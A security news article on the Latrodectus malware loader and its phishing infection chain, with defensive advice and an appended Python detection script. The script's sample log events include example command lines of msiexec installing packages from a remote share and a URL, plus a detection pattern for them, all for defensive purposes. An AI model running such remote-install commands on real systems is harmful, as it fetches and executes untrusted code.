Latrodectus Malware Takes Over IcedID’s Role in Phishing Attacks

Since early March 2024, cybersecurity researchers have detected an increase in email phishing campaigns deploying Latrodectus, a new malware loader believed to be the successor to IcedID.

According to the report, these phishing campaigns usually follow a recognizable infection chain. They start with oversized JavaScript files that abuse WMI's ability to invoke msiexec.exe, which then installs a remotely hosted MSI file from a WebDAV share.

Latrodectus possesses the typical features of malware designed to deploy additional malicious payloads, such as QakBot, DarkGate, and PikaBot, enabling threat actors to execute various post-exploitation activities.

In-depth analysis of Latrodectus artifacts indicates a strong emphasis on enumeration and execution, with the malware incorporating a self-delete function to erase running files.

Moreover, Latrodectus disguises itself as legitimate software libraries and uses source code obfuscation along with anti-analysis checks to evade detection in debugging or sandbox environments.

The malware also establishes persistence on Windows systems by creating a scheduled task and connects to a command-and-control (C2) server over HTTPS. This connection allows Latrodectus to receive commands to gather system information, update, restart, terminate itself, and execute shellcode, DLL, and other executable files.

To protect against Latrodectus malware, it is crucial to implement comprehensive cybersecurity measures. Start by educating employees about phishing scams and the dangers of opening unsolicited email attachments or clicking on unknown links. Deploy advanced endpoint protection and antivirus software that can detect and block suspicious activities. Additionally, configure your network to limit the use of WMI and msiexec.exe where possible, and monitor for unusual behavior that could indicate a breach, such as msiexec.exe being launched through WMI or installing packages from remote shares.
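The infection chain described above (WMI invoking msiexec.exe to install an MSI from a remote WebDAV share) can be turned into a simple process-creation detection. The following is an added example, not code from the report or the article, and assumes Sysmon-style field names (Image, CommandLine, ParentImage); the log events are constructed for illustration.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "\\203.0.113.10@80\share\update.msi" /qn',
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\setup.msi",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\Document_4321.js"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/pkg.msi /quiet",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\pkg.msi /qn",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
]

# An MSI package sourced from an HTTP(S) URL or a UNC/WebDAV path (\\host[@port]\share\...).
REMOTE_MSI = re.compile(r"(?i)(?:\bhttps?://\S+\.msi\b|\\\\[^\\\s]+\\\S*\.msi\b)")


def classify_event(event):
    """Return a finding dict for suspicious msiexec.exe launches, else None.

    Two independent signals are checked: a remote package source in the command
    line, and WMI's provider host (WmiPrvSE.exe) as the parent process. Both
    together are rated high; either alone is rated medium.
    """
    if not event["Image"].lower().endswith("\\msiexec.exe"):
        return None
    reasons = []
    if REMOTE_MSI.search(event["CommandLine"]):
        reasons.append("msiexec installing a package from a remote source")
    if event["ParentImage"].lower().endswith("\\wbem\\wmiprvse.exe"):
        reasons.append("msiexec spawned by the WMI provider host")
    if not reasons:
        return None
    severity = "high" if len(reasons) == 2 else "medium"
    return {"severity": severity, "reasons": reasons, "CommandLine": event["CommandLine"]}


def scan(events):
    """Run classify_event over a list of events and return the findings."""
    return [f for f in (classify_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], "-", "; ".join(finding["reasons"]))
```

Benign local installs by explorer.exe produce no finding, so the rule surfaces the WMI-plus-remote-share combination rather than every msiexec.exe launch.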